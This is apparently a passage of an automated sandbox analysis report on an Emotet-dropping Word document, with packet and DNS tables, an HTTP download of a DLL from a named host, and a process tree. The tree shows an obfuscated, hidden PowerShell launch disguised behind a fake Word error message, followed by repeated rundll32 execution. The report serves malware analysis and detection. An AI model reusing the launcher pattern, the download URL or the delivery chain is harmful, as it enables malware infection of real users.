                                    Jan 6, 2021 08:53:38.363328934 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363394022 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363435030 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363449097 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.363471985 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363508940 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363518953 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.363554955 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363585949 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363595963 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.363616943 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363646984 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363650084 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.363677979 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.363708973 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.452966928 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453018904 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453062057 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453098059 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453128099 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453160048 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453186035 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453236103 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453275919 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453275919 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.453299046 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.453305960 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453324080 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.453336954 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453367949 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453378916 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.453419924 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453449965 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453461885 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.453481913 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453512907 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453522921 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.453545094 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453577042 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453583956 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.453608036 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453638077 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.453645945 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544143915 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544207096 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544250011 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544286013 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544317007 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544334888 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544347048 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544373989 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544409990 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544410944 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544445992 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544481993 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544483900 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544518948 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544554949 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544568062 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544591904 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544627905 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544631958 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544667959 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544706106 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544708967 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544749975 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544786930 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544791937 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544832945 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544873953 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544881105 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544924974 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544956923 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.544960976 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.544986963 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545016050 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545025110 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.545043945 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545074940 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545079947 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.545105934 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545136929 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545141935 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.545170069 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545202017 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545209885 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.545233965 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545267105 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545277119 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.545300007 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545334101 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545335054 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.545371056 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545408010 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.545427084 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.545463085 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22

                                    UDP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 6, 2021 08:53:38.034178972 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                    Jan 6, 2021 08:53:38.138155937 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Jan 6, 2021 08:53:38.034178972 CET | 192.168.2.22 | 8.8.8.8 | 0xc6cc | Standard query (0) | petafilm.com | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Jan 6, 2021 08:53:38.138155937 CET | 8.8.8.8 | 192.168.2.22 | 0xc6cc | No error (0) | petafilm.com |  | 176.53.69.151 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • petafilm.com

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.22 | 49165 | 176.53.69.151 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jan 6, 2021 08:53:38.242799044 CET | 0 | OUT | GET /wp-admin/4m/ HTTP/1.1
                                    Host: petafilm.com
                                    Connection: Keep-Alive
                                    Jan 6, 2021 08:53:38.363328934 CET | 1 | IN | HTTP/1.1 200 OK
                                    Cache-Control: no-cache, must-revalidate
                                    Pragma: no-cache
                                    Content-Type: application/octet-stream
                                    Expires: Wed, 06 Jan 2021 07:53:49 GMT
                                    Last-Modified: Wed, 06 Jan 2021 07:53:49 GMT
                                    Server: Microsoft-IIS/10.0
                                    Set-Cookie: 5ff56c8d1a339=1609919629; expires=Wed, 06-Jan-2021 07:54:49 GMT; Max-Age=60; path=/
                                    Content-Disposition: attachment; filename="bLH.dll"
                                    Content-Transfer-Encoding: binary
                                    X-Powered-By: ASP.NET
                                    X-Powered-By-Plesk: PleskWin
                                    Date: Wed, 06 Jan 2021 07:53:48 GMT
                                    Content-Length: 192000
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 
00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    System Behavior

                                    General

                                    Start time:08:53:37
                                    Start date:06/01/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                    Imagebase:0x13f480000
                                    File size:1424032 bytes
                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:08:53:39
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                                    Imagebase:0x4a9e0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:08:53:40
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\msg.exe
                                    Wow64 process (32bit):false
                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                    Imagebase:0xff0b0000
                                    File size:26112 bytes
                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:08:53:40
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:POwersheLL -w hidden -ENCOD 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
                                    Imagebase:0x13f0d0000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092921880.0000000000366000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092945570.0000000001B86000.00000004.00000001.sdmp, Author: Florian Roth
                                    Reputation:high

                                    General

                                    Start time:08:53:43
                                    Start date:06/01/2021
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                    Imagebase:0xff970000
                                    File size:45568 bytes
                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:08:53:43
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:08:53:44
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:08:53:45
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:08:53:45
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:08:53:46
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:08:53:46
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:08:53:47
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security

                                    General

                                    Start time:08:53:48
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, Author: Joe Security

                                    General

                                    Start time:08:53:48
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, Author: Joe Security

                                    General

                                    Start time:08:53:49
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, Author: Joe Security

                                    General

                                    Start time:08:53:50
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, Author: Joe Security

                                    General

                                    Start time:08:53:50
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                                    Imagebase:0x490000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security

                                    General

                                    Start time:08:53:51
                                    Start date:06/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                                    Imagebase:0x11f0000
                                    File size:44544 bytes
